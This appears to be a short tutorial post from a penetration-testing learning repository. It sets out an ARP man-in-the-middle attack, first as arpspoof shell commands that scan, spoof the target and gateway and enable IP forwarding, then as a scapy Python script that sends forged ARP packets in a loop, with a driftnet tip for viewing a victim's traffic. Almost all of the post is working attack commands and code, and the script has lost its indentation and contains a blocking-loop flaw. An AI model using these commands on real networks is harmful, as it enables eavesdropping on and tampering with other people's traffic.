intro

1
2
3
4
5
# author: huangyuhui
# date: november 25,2019
# envir: 5.2.0-kali2
# desc: the detailed steps and the simple codes about the dns attack
# repo address: https://github.com/yubuntu0109/penetration-testing-learning

ARP MitM attack with the tool of arpspoof

1
2
3
4
5
6
7
8
9
10
11
12
13
'''
>> scan the targete ip
nmap -sP 192.168.xxx.*

>> spoofing the target host: disguised as the gateway,the real identity is attacker
arpspoof -i wlan0 -t 192.168.xxx.xxx(targetIP) 192.168.xxx.xxx(gateway)

>> spoofing the gateway: disguised as the targetIP, the real identity is attacker
arpspoof -i wlan0 -t 192.168.xxx.xxx(gatewayIP) 192.168.xxx.xxx(targetIP)

>> traffic forwarding: forward the data package to the gateway
echo 1 >/proc/sys/net/ipv4/ip_forward
'''

ARP Man-in-the-middle attack with python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import sys
import time
import optparse
import subprocess
from scapy.all import sendp, ARP, Ether


def main():

''' init the parameters '''
parser = optparse.OptionParser("usage: %prog -v <victimIP> -g <gatewayIP>")
parser.add_option('-v', dest='victimIP', type='string', help='the specified targate ip')
parser.add_option('-g', dest='gatewayIP', type='string', help='the specified gateway ip')
(options, args) = parser.parse_args()
if (options.victimIP == None) | (options.gatewayIP == None):
print parser.usage
exit(0)
else:
victimIP = options.victimIP
gatewayIP = options.gatewayIP

''' MitM attack '''
try:
attackGateway = Ether()/ARP(psrc=victimIP, pdst=gatewayIP)
attackTarget = Ether()/ARP(psrc=gatewayIP, pdst=victimIP)
print '[ok]:MitM attack is running'
sendp(attackGateway, inter=1, loop=1) # send the data package to the target host circularly
sendp(attackTarget, inter=1, loop=1) # send the data package to the gateway circularly
except: # except optparser.TypeError as e:
pass # print 'error:please enter the correct parameters'

# traffic forwarding
n = subprocess.call('echo 1 >> /proc/sys/net/ipv4/ip_forward', shell=True)
print(("[x]:the traffic forwarding hasn't opened","[ok]:the traffic forwarding has opened")[n==0])


# run: python arpspoofing.py -v <victim ip> -g <gateway ip>
# test: see the effects by the tool of driftnet : driftnet -v -b -i wlan0(interface name)
if __name__ == '__main__':
main()

moments

😅 a simple arp spoofing~